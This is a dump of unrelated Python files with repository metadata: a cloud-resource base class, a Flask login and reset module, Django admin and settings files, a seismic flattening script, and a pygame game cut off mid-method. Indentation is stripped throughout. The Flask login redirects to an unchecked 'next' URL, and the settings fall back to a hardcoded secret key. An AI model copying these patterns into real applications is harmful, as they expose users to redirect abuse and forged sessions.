# If a class have two list attributes i.e.
# class Example(AutoRegisterResourceMeta):
# CLOUD = ['GCP', 'AWS']
# ENGINE = ['mysql', 'postgres']
# ....
# GetResourceClass(Example, CLOUD='GCP', ENGINE='mysql')
# would return Example.
attributes = [[cls.RESOURCE_TYPE]]
for attr in sorted(cls.REQUIRED_ATTRS):
value = getattr(cls, attr)
if not isinstance(value, list):
attributes.append([(attr, value)])
else:
attributes.append([(attr, i) for i in value])
# Cross product
for key in itertools.product(*attributes):
_RESOURCE_REGISTRY[tuple(key)] = cls
super(AutoRegisterResourceMeta, cls).__init__(name, bases, dct)
class BaseResource(metaclass=AutoRegisterResourceMeta):
"""An object representing a cloud resource.
Attributes:
created: True if the resource has been created.
deleted: True if the resource has been deleted.
user_managed: Whether Create() and Delete() should be skipped.
restored: True if the resource has been restored.
enable_freeze_restore: Whether the resource should use freeze/restore when
the option is specified on the command line. Different benchmarks may want
different resources to have freeze/restore enabled.
create_on_restore_error: Whether to create the resource if there is an issue
while restoring.
delete_on_freeze_error: Whether to delete the resource if there is an issue
while freezing.
create_start_time: The start time of the last create.
delete_start_time: The start time of the last delete.
create_end_time: The end time of the last create.
delete_end_time: The end time of the last delete.
resource_ready_time: The time when the resource last became ready.
metadata: Dictionary of resource metadata.
"""
# The name of the base class (e.g. BaseVirtualMachine) that will be extended
# with auto-registered subclasses.
RESOURCE_TYPE = None
# A list of attributes that are used to register Resource subclasses
# (e.g. CLOUD).
REQUIRED_ATTRS = ['CLOUD']
# Timeout in seconds for resource to be ready.
READY_TIMEOUT = None
# Time between retries.
POLL_INTERVAL = 5
def __init__(
self,
user_managed=False,
enable_freeze_restore=False,
create_on_restore_error=False,
delete_on_freeze_error=False,
):
super(BaseResource, self).__init__()
# Class level attributes does not persist after pickle
# Copy required attributes to the object
for attribute in self.REQUIRED_ATTRS:
setattr(self, attribute, getattr(self, attribute, None))
self.created = user_managed
self.deleted = user_managed
self.user_managed = user_managed
self.restored: bool = False
self.enable_freeze_restore = enable_freeze_restore
self.create_on_restore_error = create_on_restore_error
self.delete_on_freeze_error = delete_on_freeze_error
# Creation and deletion time information
# that we may make use of later.
self.create_start_time = None
self.delete_start_time = None
self.create_end_time = None
self.delete_end_time = None
self.resource_ready_time = None
self.metadata = dict()
def GetResourceMetadata(self):
"""Returns a dictionary of metadata about the resource."""
return self.metadata.copy()
@abc.abstractmethod
def _Create(self):
"""Creates the underlying resource."""
raise NotImplementedError()
def _Restore(self) -> None:
"""Restores the underlying resource from a file.
This method is required if using Restore() with a resource.
"""
raise NotImplementedError()
def _Freeze(self) -> None:
"""Freezes the underlying resource to a long-term, sustainable state.
This method is required if using Restore() with a resource.
"""
raise NotImplementedError()
def _UpdateTimeout(self, timeout_minutes: int) -> None:
"""Updates the underlying resource's timeout after a successful freeze.
This method is required if using Freeze()/Restore() with a resource.
Args:
timeout_minutes: The number of minutes past the current time at which the
resource should be considered expired.
"""
raise NotImplementedError()
@abc.abstractmethod
def _Delete(self):
"""Deletes the underlying resource.
Implementations of this method should be idempotent since it may
be called multiple times, even if the resource has already been
deleted.
"""
raise NotImplementedError()
def _Exists(self):
"""Returns true if the underlying resource exists.
Supplying this method is optional. If it is not implemented then the
default is to assume success when _Create and _Delete do not raise
exceptions.
"""
raise NotImplementedError()
def _WaitUntilRunning(self):
"""Waits until the resource is (or was) running.
Supplying this method is optional. Use it when a resource is created using
an asynchronous create command and its status is verified as running via
repeatedly polling the resource with 'describe' commands.
"""
pass
def _IsReady(self):
"""Return true if the underlying resource is ready.
Supplying this method is optional. Use it when a resource can exist
without being ready. If the subclass does not implement
it then it just returns true.
Returns:
True if the resource was ready in time, False if the wait timed out.
"""
return True
def _IsDeleting(self):
"""Return true if the underlying resource is getting deleted.
Supplying this method is optional. Potentially use when the resource has an
asynchronous deletion operation to avoid rerunning the deletion command and
track the deletion time correctly. If the subclass does not implement it
then it just returns false.
Returns:
True if the resource was being deleted, False if the resource was in a non
deleting state.
"""
return False
def _PreDelete(self):
"""Method that will be called once before _DeleteResource() is called.
Supplying this method is optional. If it is supplied, it will be called
once, before attempting to delete the resource. It is intended to allow
data about the resource to be collected right before it is deleted.
"""
pass
def _PostCreate(self):
"""Method that will be called once after _CreateResource() is called.
Supplying this method is optional. If it is supplied, it will be called
once, after the resource is confirmed to exist. It is intended to allow
data about the resource to be collected or for the resource to be tagged.
"""
pass
def _CreateDependencies(self):
"""Method that will be called once before _CreateResource() is called.
Supplying this method is optional. It is intended to allow additional
flexibility in creating resource dependencies separately from _Create().
"""
pass
def _DeleteDependencies(self):
"""Method that will be called once after _DeleteResource() is called.
Supplying this method is optional. It is intended to allow additional
flexibility in deleting resource dependencies separately from _Delete().
"""
pass
@vm_util.Retry(retryable_exceptions=(errors.Resource.RetryableCreationError,))
def _CreateResource(self):
"""Reliably creates the underlying resource."""
if self.created:
return
# Overwrite create_start_time each time this is called,
# with the assumption that multple calls to Create() imply
# that the resource was not actually being created on the
# backend during previous failed attempts.
self.create_start_time = time.time()
self._Create()
try:
if not self._Exists():
raise errors.Resource.RetryableCreationError(
'Creation of %s failed.' % type(self).__name__)
except NotImplementedError:
pass
self._WaitUntilRunning()
self.created = True
self.create_end_time = time.time()
@vm_util.Retry(retryable_exceptions=(errors.Resource.RetryableDeletionError,),
timeout=3600)
def _DeleteResource(self):
"""Reliably deletes the underlying resource."""
# Retryable method which allows waiting for deletion of the resource.
@vm_util.Retry(poll_interval=self.POLL_INTERVAL, fuzz=0, timeout=3600,
retryable_exceptions=(
errors.Resource.RetryableDeletionError,))
def WaitUntilDeleted():
if self._IsDeleting():
raise errors.Resource.RetryableDeletionError('Not yet deleted')
if self.deleted or not self.created:
return
if not self.delete_start_time:
self.delete_start_time = time.time()
self._Delete()
WaitUntilDeleted()
try:
if self._Exists():
raise errors.Resource.RetryableDeletionError(
'Deletion of %s failed.' % type(self).__name__)
except NotImplementedError:
pass
def Restore(self) -> None:
"""Restores a resource instead of creating it.
Raises:
RestoreError: Generic error encompassing restore failures.
"""
# TODO(user): Add usage lock with labels to prevent multiple
# benchmarks from using the same resource concurrently.
logging.info('Restoring resource %s.', repr(self))
try:
self._Restore()
except NotImplementedError as e:
raise errors.Resource.RestoreError(
f'Class {self.__class__} does not have _Restore() implemented but a '
'restore file was provided.') from e
except Exception as e:
raise errors.Resource.RestoreError('Error restoring resource '
f'{repr(self)}') from e
self.restored = True
self.UpdateTimeout(FLAGS.timeout_minutes)
def Create(self, restore: bool = False) -> None:
"""Creates a resource and its dependencies.
Args:
restore: Whether to restore the resource instead of creating. If
enable_freeze_restore is false, this proceeds with creation.
Raises:
RestoreError: If there is an error while restoring.
"""
@vm_util.Retry(poll_interval=self.POLL_INTERVAL, fuzz=0,
timeout=self.READY_TIMEOUT,
retryable_exceptions=(
errors.Resource.RetryableCreationError,))
def WaitUntilReady():
if not self._IsReady():
raise errors.Resource.RetryableCreationError('Not yet ready')
if self.user_managed:
return
if restore and self.enable_freeze_restore:
try:
self.Restore()
return
except errors.Resource.RestoreError:
logging.exception(
'Encountered an exception while attempting to Restore(). '
'Creating: %s', self.create_on_restore_error)
if not self.create_on_restore_error:
raise
self._CreateDependencies()
self._CreateResource()
WaitUntilReady()
if not self.resource_ready_time:
self.resource_ready_time = time.time()
self._PostCreate()
def Freeze(self) -> None:
"""Freezes a resource instead of deleting it.
Raises:
FreezeError: Generic error encompassing freeze failures.
"""
logging.info('Freezing resource %s.', repr(self))
# Attempt to call freeze, failing if unimplemented.
try:
self._Freeze()
except NotImplementedError as e:
raise errors.Resource.FreezeError(
f'Class {self.__class__} does not have _Freeze() implemented but '
'Freeze() was called.') from e
except Exception as e:
raise errors.Resource.FreezeError(
f'Error freezing resource {repr(self)}') from e
# If frozen successfully, attempt to update the timeout.
self.restored = False
self.UpdateTimeout(FLAGS.persistent_timeout_minutes)
def Delete(self, freeze: bool = False) -> None:
"""Deletes a resource and its dependencies.
Args:
freeze: Whether to freeze the resource instead of deleting. If
enable_freeze_restore is false, this proceeds with deletion.
Raises:
FreezeError: If there is an error while freezing.
"""
if self.user_managed:
return
# Some resources (specifically VMs) lazily compute their metadata rather
# than computing it after provisioning and stashing in their metadata dict
# or static fields as they are supposed to.
# Asking for metadata before deleting it should cache it and make it
# available after we tear down resources, which is necessary for attaching
# metadata in benchmark_spec.GetSamples()
self.GetResourceMetadata()
if freeze and self.enable_freeze_restore:
try:
self.Freeze()
return
except errors.Resource.FreezeError:
logging.exception(
'Encountered an exception while attempting to Freeze(). '
'Deleting: %s', self.delete_on_freeze_error)
if not self.delete_on_freeze_error:
raise
self._PreDelete()
self._DeleteResource()
self.deleted = True
self.delete_end_time = time.time()
self._DeleteDependencies()
def UpdateTimeout(self, timeout_minutes: int) -> None:
"""Updates the timeout of the underlying resource.
Args:
timeout_minutes: The number of minutes past the current time at which the
resource should be considered expired.
Raises:
NotImplementedError: If the resource has not implemented _UpdateTimeout().
"""
logging.info('Updating timeout for %s.', repr(self))
try:
self._UpdateTimeout(timeout_minutes)
except NotImplementedError:
logging.exception(
'Class %s does not have _UpdateTimeout() implemented, which is '
'needed for Freeze(). Please add an implementation.', self.__class__)
raise
def GetSamples(self) -> List[sample.Sample]:
"""Get samples relating to the provisioning of the resource."""
# This should not be necessary. Resources are responsible to wire their
# GetResourceMetadata into publisher.py, but some do not.
metadata = self.GetResourceMetadata()
metadata['resource_type'] = self.RESOURCE_TYPE
metadata['resource_class'] = self.__class__.__name__
samples = []
if self.create_start_time and self.create_end_time:
samples.append(
sample.Sample(
'Time to Create',
self.create_end_time - self.create_start_time,
'seconds',
metadata,
)
)
if self.create_start_time and self.resource_ready_time:
samples.append(
sample.Sample(
'Time to Ready',
self.resource_ready_time - self.create_start_time,
'seconds',
metadata,
)
)
if self.delete_start_time and self.delete_end_time:
samples.append(
sample.Sample(
'Time to Delete',
self.delete_end_time - self.delete_start_time,
'seconds',
metadata,
)
)
return samples
| UTF-8 | Python | false | false | 17,842 | py | 1,120 | resource.py | 818 | 0.677559 | 0.676494 | 0 | 514 | 33.712062 | 80 |
afcarl/Thor-Server | 10,084,583,223,026 | 137237b603812b8f69de9d04f1458febbd36f282 | 3e3f0c127ab5750d6bf37e2e6a922f69cb3e0114 | /website/views/login.py | e151f60cd61999737c680cc232242f55dff7af29 | [
"MIT"
]
| permissive | https://github.com/afcarl/Thor-Server | 823ecbf8c23e756e17ba5cd4def17f384b6dbf9c | 1acaf7436b22100ef241c779365fb0297165c063 | refs/heads/master | 2020-09-04T17:36:13.759521 | 2018-06-04T10:41:52 | 2018-06-04T10:41:52 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from flask import Blueprint, render_template, redirect, flash, request, url_for
from flask_login import login_user, logout_user, login_required
from ..utils import require_unauthed, ts, send_email
from ..forms import LoginForm, EmailForm, PasswordForm
from ..models import User
from .. import db
login = Blueprint("login", __name__)
@login.route("/login/", methods=["GET", "POST"])
@require_unauthed
def login_page():
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(
username=form.username.data
).first()
login_user(user, form.remember_me.data)
flash("Logged in successfully!", "success")
next = request.args.get("next")
return redirect(next or url_for("index.page"))
return render_template("login.jinja2", form=form)
@login.route("/logout/")
@login_required
def logout_page():
logout_user()
flash("Logged out successfully!", "success")
return redirect(url_for("index.page"))
@login.route('/reset/', methods=["GET", "POST"])
@require_unauthed
def reset():
form = EmailForm()
if form.validate_on_submit():
# Send an email to the user requesting to change the account's password.
user = User.query.filter_by(email=form.email.data).first_or_404()
subject = "Password reset requested"
# Here we use the URLSafeTimedSerializer we created.
token = ts.dumps(user.email, salt="recover-key")
recover_url = url_for("login.reset_with_token", token=token, _external=True)
html = render_template("email/recover.jinja2", recover_url=recover_url)
send_email(user.email, subject, html)
flash("Sent password reset request to {}".format(form.email.data),
"success")
return redirect(url_for("index.page"))
return render_template("reset.jinja2", form=form)
@login.route('/reset/<token>', methods=["GET", "POST"])
@require_unauthed
def reset_with_token(token):
try:
email = ts.loads(token, salt="recover-key", max_age=86400)
except:
abort(404)
form = PasswordForm()
if form.validate_on_submit():
user = User.query.filter_by(email=email).first_or_404()
user.password = form.password.data
db.session.commit()
flash("Successfully reset password!", "success")
return redirect(url_for("login.login_page"))
return render_template("reset_with_token.jinja2", form=form, token=token)
| UTF-8 | Python | false | false | 2,465 | py | 55 | login.py | 33 | 0.656795 | 0.649493 | 0 | 74 | 32.310811 | 84 |
azmtva01/Money-Control | 4,552,665,352,227 | db03b193cddc969c8f01a7a77202f62b2cccc209 | 30250bc838b78e8fb4f20fc66f1ac9e0894a835a | /moneyproj/moneyapp/admin.py | a64d56137cbe4bb05aa13adde932042e72b789a6 | []
| no_license | https://github.com/azmtva01/Money-Control | 67eaa93e4429302752c1c2f442b2d4555f790883 | 1867d3db4ea0c6a8a1da9fe5549e52a631f88362 | refs/heads/master | 2022-07-29T19:03:53.995792 | 2020-05-22T10:47:01 | 2020-05-22T10:47:01 | 266,083,774 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.contrib import admin
from django.utils.safestring import mark_safe
from .models import Category, Person, Budget
class BudgetInline(admin.TabularInline):
model = Budget
extra = 1
class PersonAdmin(admin.ModelAdmin):
list_display = ('name', 'age', 'user_profile', 'currency', 'auth_code', 'total_account', 'image', 'id')
readonly_fields = ('get_image', 'id')
inlines = [BudgetInline]
save_on_top = True
search_fields = ('name',)
def get_image(self, obj):
return mark_safe(f'<img src={obj.image.url} width="50", height="60" ')
get_image.short_description = 'Image'
class BudgetAdmin(admin.ModelAdmin):
list_display = ('person', 'income_value', 'expense_value', 'category', 'added_date', 'id')
list_filter = ('category', 'added_date', )
search_fields = ('person', 'income_value', )
class CategoryAdmin(admin.ModelAdmin):
list_display = ('title', 'budget_choice', 'id')
list_filter = ('title',)
search_fields = ('title',)
admin.site.register(Category, CategoryAdmin)
admin.site.register(Person, PersonAdmin)
admin.site.register(Budget, BudgetAdmin)
admin.site.site_title = "Money Control"
admin.site.site_header = "Money Control"
| UTF-8 | Python | false | false | 1,216 | py | 11 | admin.py | 11 | 0.677632 | 0.67352 | 0 | 39 | 30.179487 | 107 |
leantony/learing-python | 3,066,606,650,565 | 6dc976f4598be80b6bfa355dedb754d8039be160 | fd602843d5a5ba03c186fb578f0a775ee175a079 | /files.py | 037a71fa17feda508aed9c8b678bd98c200ddc2b | []
| no_license | https://github.com/leantony/learing-python | 6ef6cb1944587e3036cca0af0bf5dde4cd287e3a | 846e263da64cc561d84ff20462874896cefc43e3 | refs/heads/master | 2021-08-18T19:47:38.404290 | 2017-11-23T17:44:42 | 2017-11-23T17:44:42 | 105,186,698 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | data = open('alice.txt', 'r')
content = data.read()
i = 0
s = []
for line in content.split():
i +=1
s.append(line)
print(len(s))
| UTF-8 | Python | false | false | 133 | py | 12 | files.py | 10 | 0.586466 | 0.571429 | 0 | 10 | 12.3 | 29 |
drdavidknott/betterstart | 16,630,113,384,106 | e3f6074589a9a6f9388bb407a904877fe883eeb5 | bf2aa4eab14a6a5347fe4af65cc4a37f512a465d | /betterstart/settings.py | 73aa5d9f84c613aea47477541215b345859de51f | []
| no_license | https://github.com/drdavidknott/betterstart | 0cda889f5cd6bb779f6d1fa75cb4f2ef08eb626c | 59e2f8282b34b7c75e1e19e1cfa276b787118adf | refs/heads/master | 2023-05-04T07:32:24.796488 | 2023-04-16T15:26:30 | 2023-04-16T15:26:30 | 173,626,906 | 0 | 0 | null | false | 2023-02-18T07:27:55 | 2019-03-03T20:37:01 | 2022-01-02T10:33:21 | 2023-02-18T07:27:18 | 6,245 | 0 | 0 | 30 | Python | false | false | """
Django settings for betterstart project.
Generated by 'django-admin startproject' using Django 2.1.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# Get the secret key from the environment variable; default is only here to support local development
SECRET_KEY = os.getenv('BETTERSTART_SK','=lnd59!%m+51yz(h&-ud07cs8a(1kzw&_utqjoxi+50+=45f44')
# Get the debug flag from the relevant environment variable
if os.getenv('BETTERSTART_DEBUG',None) == 'True':
DEBUG = True
# otherwise turn off debug
else:
DEBUG = False
ALLOWED_HOSTS = [
'betterstart-236907.appspot.com',
'127.0.0.1',
'oysta.org',
'www.oysta.org',
'betterstart.oysta.org',
'betterstart-uat.appspot.com',
]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'people.apps.PeopleConfig',
'crispy_forms',
'django_otp',
'django_otp.plugins.otp_totp',
'django_otp.plugins.otp_hotp',
'django_otp.plugins.otp_static',
'zxcvbn_password',
'jsignature',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django_otp.middleware.OTPMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'betterstart.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'betterstart.wsgi.application'
CRISPY_TEMPLATE_PACK = 'bootstrap3'
OTP_TOTP_ISSUER = os.getenv('BETTERSTART_OTP_ISSUER','Betterstart OTP Default')
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
if os.getenv('BETTERSTART_DB', None) == 'local':
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
elif os.getenv('GAE_APPLICATION', None):
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'HOST': os.getenv('BETTERSTART_DB_HOST', None),
'USER': os.getenv('BETTERSTART_DB_USER', None),
'PASSWORD': os.getenv('BETTERSTART_PW', None),
'NAME': os.getenv('BETTERSTART_DB_NAME', None),
}
}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'HOST': '127.0.0.1',
'PORT': os.getenv('BETTERSTART_DB_PORT', None),
'NAME': os.getenv('BETTERSTART_DB_NAME', None),
'USER': os.getenv('BETTERSTART_DB_USER', None),
'PASSWORD': os.getenv('BETTERSTART_PW', None),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
{
'NAME': 'zxcvbn_password.ZXCVBNValidator',
'OPTIONS': {
'min_score': 3,
'user_attributes': ('username', 'email', 'first_name', 'last_name')
}
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/London'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = 'static'
MEDIA_ROOT = 'media'
MEDIA_URL = '/media/'
# Authentication
LOGIN_URL = '/people/login'
# Sendgrid email settings
SENDGRID_API_KEY = os.getenv('SENDGRID_API_KEY')
EMAIL_HOST = 'smtp.sendgrid.net'
EMAIL_HOST_USER = 'apikey'
EMAIL_HOST_PASSWORD = SENDGRID_API_KEY
EMAIL_PORT = 587
EMAIL_USE_TLS = True
| UTF-8 | Python | false | false | 4,728 | py | 342 | settings.py | 193 | 0.71214 | 0.699027 | 0 | 186 | 24.419355 | 101 |
zfbi/lss | 15,187,004,362,472 | 42fc6b8134b5bfca5c4356cdb0e6b6f24926abc8 | 06a775cbc3fdfd2069eda66c5ed0e7b04633b470 | /src/lss/flat/flatr3.py | 76c5e10a6dc065b171b00afcba9bf9c0d5444b85 | []
| no_license | https://github.com/zfbi/lss | 6937fe53a8c34e1d1b819ee7e9ae20e08d6d634d | d09aac9fe6dc7f2ed88f66cb4803676ade67a1ff | refs/heads/master | 2021-05-30T03:02:14.632492 | 2014-11-24T21:42:44 | 2014-11-24T21:42:44 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''
Non-vertical flattening using transformed rotation equations
'''
from imports import *
pngDir = None
#pngDir = '/Users/sluo/Desktop/'
seisDir = '/data/scratch/'
s1,s2,s3 = Sampling(201),Sampling(201),Sampling(201)
n1,n2,n3 = s1.count,s2.count,s3.count
k1,k2,k3 = 190,190,190; azimuth=240; elevation=20 # for 3D views
timer = Stopwatch()
#############################################################################
def main(args):
show()
#makeFake3d()
#goFlatten()
def show():
f = read('f'); display(f,name='f')
g = read('g'); display(g,name='g')
def goFlatten():
slopes = False
shifts = False
f = read('f')
if slopes:
u1,u2,u3,ep = like(f),like(f),like(f),like(f)
timer.restart(); print 'slopes...'
LocalOrientFilter(1.0,1.0).applyForNormalPlanar(f,u1,u2,u3,ep)
timer.stop(); print 'slopes in %.2fs'%timer.time()
fill(u1[n3/2][n2/2][n1/2],u1)
fill(u2[n3/2][n2/2][n1/2],u2)
fill(u3[n3/2][n2/2][n1/2],u3)
fill(1.0,ep)
#display(u1,cmap=jet,name='u1')
#display(u2,cmap=jet,name='u2')
#display(u3,cmap=jet,name='u3')
#display(ep,cmap=jet,name='ep')
write('u1',u1)
write('u2',u2)
write('u3',u3)
write('ep',ep)
if shifts:
u1,u2,u3,ep = read('u1'),read('u2'),read('u3'),read('ep')
timer.restart(); print 'shifts...'
r = FlattenerRT(6.0,6.0).findShifts([u1,u2,u3,pow(ep,8.0)])
timer.stop(); print 'shifts in %.2fs'%timer.time()
r1,r2,r3 = r[0],r[1],r[2]
#display(r1,cmap=jet,name='r1')
#display(r2,cmap=jet,name='r2')
#display(r3,cmap=jet,name='r3')
g = FlattenerUtil.applyShiftsR(f,r)
write('g',g)
write('r1',r1)
write('r2',r2)
write('r3',r3)
g,r1,r2,r3 = read('g'),read('r1'),read('r2'),read('r3')
display(f,name='f')
display(g,name='g')
display(r1,cmap=jet,name='r1')
display(r2,cmap=jet,name='r2')
display(r3,cmap=jet,name='r3')
def like(x):
return zerofloat(len(x[0][0]),len(x[0]),len(x))
def makeFake3d():
n1p = int(1.8*n1)
g = FakeData.seismic3d2010A(n1p,n2,n3,0.0,0.0,0.0,1.0,0.0)
s = like(g)
for i3 in range(n3):
for i2 in range(n2):
r = abs(i3+i2)*0.3
s[i3][i2] = fillfloat(r,n1p)
zero = zerofloat(n1p,n2,n3)
t = FlattenerUtil.applyShiftsS(g,[s,zero,zero])
f = copy(n1,n2,n3,int(0.5*(n1p-n1)),0,0,t)
display(f)
write('f',f)
#############################################################################
gray = ColorMap.GRAY
jet = ColorMap.JET
rwb = ColorMap.RED_WHITE_BLUE
def plot(x,cmap=gray,cmin=0.0,cmax=0.0,cbar=None,name=None):
pan = panel(cbar)
pix = pan.addPixels(x)
pix.setColorModel(cmap)
if cmin<cmax:
pix.setClips(cmin,cmax)
pix.setInterpolation(PixelsView.Interpolation.LINEAR)
frame(pan,name)
def panel(cbar=None):
p = PlotPanel(PlotPanel.Orientation.X1DOWN_X2RIGHT)
cb = p.addColorBar()
if cbar:
cb.setLabel(cbar)
return p
def frame(panel,name=None):
frame = PlotFrame(panel)
frame.setBackground(Color(204,204,204,255))
#frame.setFontSizeForSlide(1.0,1.0)
frame.setSize(1200,600)
if name:
frame.setTitle(name)
frame.setVisible(True)
if name and pngDir:
frame.paintToPng(360,3.0,pngDir+name+'.png')
def read(name,image=None):
if not image:
image = zerofloat(n1,n2,n3)
fileName = seisDir+name+'.dat'
ais = ArrayInputStream(fileName)
ais.readFloats(image)
ais.close()
return image
def write(name,image,directory=seisDir):
fileName = directory+name+'.dat'
aos = ArrayOutputStream(fileName)
aos.writeFloats(image)
aos.close()
from org.python.util import PythonObjectInputStream
def readTensors(name):
fis = FileInputStream(seisDir+name+".dat")
ois = PythonObjectInputStream(fis)
tensors = ois.readObject()
fis.close()
return tensors
def writeTensors(name,tensors):
fos = FileOutputStream(seisDir+name+".dat")
oos = ObjectOutputStream(fos)
oos.writeObject(tensors)
fos.close()
#############################################################################
# graphics
def display(image,tensors=None,cmap=gray,cbar=None,
cmin=0,cmax=0,perc=100,name=None):
#return
world = World()
ipg = addImageToWorld(world,image,cmap,cmin,cmax,perc)
if tensors:
addTensorsToIpg(ipg,tensors)
frame = makeFrame(world,name)
if cbar:
colorbar = addColorBar(frame,cbar)
ipg.addColorMapListener(colorbar)
def display2(image1,image2,cmap1=gray,cmap2=gray,name=None):
world = World()
addImageToWorld(world,image1,cmap1)
addImageToWorld(world,image2,cmap2)
makeFrame(world,name)
def addImageToWorld(world,image,cmap=gray,cmin=0,cmax=0,perc=100):
ipg = ImagePanelGroup(s1,s2,s3,image)
ipg.setColorModel(cmap)
ipg.setSlices(k1,k2,k3)
if cmin<cmax:
ipg.setClips(cmin,cmax)
if perc<100:
ipg.setPercentiles(100-perc,perc)
world.addChild(ipg)
return ipg
def addTensorsToIpg(ipg,mt):
def add(ip,mt,esize=20):
#tp = TensorsPanel(s1,s2,s3,mt)
tp = TensorsPanel(mt)
tp.setEllipsoidSize(esize)
ip.getFrame().addChild(tp)
return tp
add(ipg.getImagePanel(Axis.X),mt)
add(ipg.getImagePanel(Axis.Y),mt)
add(ipg.getImagePanel(Axis.Z),mt)
def addColorBar(frame,label):
cbar = ColorBar(label)
cbar.setFont(cbar.getFont().deriveFont(24.0))
frame.add(cbar,BorderLayout.EAST)
#frame.viewCanvas.setBackground(frame.getBackground())
return cbar
def makeFrame(world,name=None):
n1,n2,n3 = s1.count,s2.count,s3.count
d1,d2,d3 = s1.delta,s2.delta,s3.delta
f1,f2,f3 = s1.first,s2.first,s3.first
l1,l2,l3 = s1.last,s2.last,s3.last
frame = SimpleFrame(world)
frame.setBackground(Color(204,204,204,255))
if name:
frame.setTitle(name)
view = frame.getOrbitView()
zscale = 0.75*max(n2*d2,n3*d3)/(n1*d1)
view.setAxesScale(1.0,1.0,zscale)
view.setScale(1.3)
view.setAzimuth(azimuth)
view.setElevation(elevation)
view.setWorldSphere(BoundingSphere(BoundingBox(f3,f2,f1,l3,l2,l1)))
frame.viewCanvas.setBackground(frame.getBackground())
#frame.setSize(1460,980)
frame.setSize(1020,750)
frame.setVisible(True)
return frame
def slice12(k3,f):
n1,n2,n3 = len(f[0][0]),len(f[0]),len(f)
s = zerofloat(n1,n2)
SimpleFloat3(f).get12(n1,n2,0,0,k3,s)
return s
def slice13(k2,f):
n1,n2,n3 = len(f[0][0]),len(f[0]),len(f)
s = zerofloat(n1,n3)
SimpleFloat3(f).get13(n1,n3,0,k2,0,s)
return s
def slice23(k1,f):
n1,n2,n3 = len(f[0][0]),len(f[0]),len(f)
s = zerofloat(n2,n3)
SimpleFloat3(f).get23(n2,n3,k1,0,0,s)
return s
def normal(x,y):
div(x,max(abs(x)),y)
#############################################################################
# Run the function main on the Swing thread
import sys,time
class RunMain(Runnable):
def run(self):
start = time.time()
main(sys.argv)
s = time.time()-start
h = int(s/3600); s -= h*3600
m = int(s/60); s -= m*60
print '%02d:%02d:%02d'%(h,m,s)
SwingUtilities.invokeLater(RunMain())
| UTF-8 | Python | false | false | 6,853 | py | 101 | flatr3.py | 100 | 0.636364 | 0.577557 | 0 | 249 | 26.522088 | 77 |
primeschool-it/Y13 | 8,203,387,551,570 | 7b93d2d6ba12d2670fa43c50099993b61f35c3c0 | b0a1b2c41556ca4e7368510b40e892e71c703e13 | /platfomer/platform.py | 2655a63a8ca1ca2a7bb9514e00155ed506d9eece | []
| no_license | https://github.com/primeschool-it/Y13 | d2c5bd145f8c05348c0aa870a4685dce7899a9c1 | 1684e82407deb6a2d47b591259230ee198074787 | refs/heads/main | 2023-03-29T04:59:13.061432 | 2021-03-31T15:56:28 | 2021-03-31T15:56:28 | 303,971,912 | 1 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pygame
pygame.init()
screen = pygame.display.set_mode((1000, 1000))
background = pygame.image.load('img/sky.jpg')
background = pygame.transform.scale(background, (1000,1000))
tile_size = 100
maryo_group = pygame.sprite.Group()
class Player(pygame.sprite.Sprite):
def __init__(self, x, y):
super(Player, self).__init__()
image = pygame.image.load('img/maryo.png')
left_image = pygame.transform.scale(image, (40,70))
right_image = pygame.transform.flip(image,True, False)
self.image = image
self.right_image = right_image
self.rect = image.get_rect()
self.rect.x = 100
self.rect.y = 830
self.direction = 'right'
self.execution_counter = 0
def update(self):
print(self.rect.x, self.rect.y)
screen.blit(self.image,(self.rect.x, self.rect.y))
keys = pygame.key.get_pressed()
if keys[pygame.K_LEFT]:
self.direction = 'left'
self.rect.x = self.rect.x - 10
if keys[pygame.K_RIGHT]:
self.direction = 'right'
self.rect.x = self.rect.x + 10
if self.direction == 'left':
screen.blit(self.right_image, (self.rect.x, self.rect.y))
else:
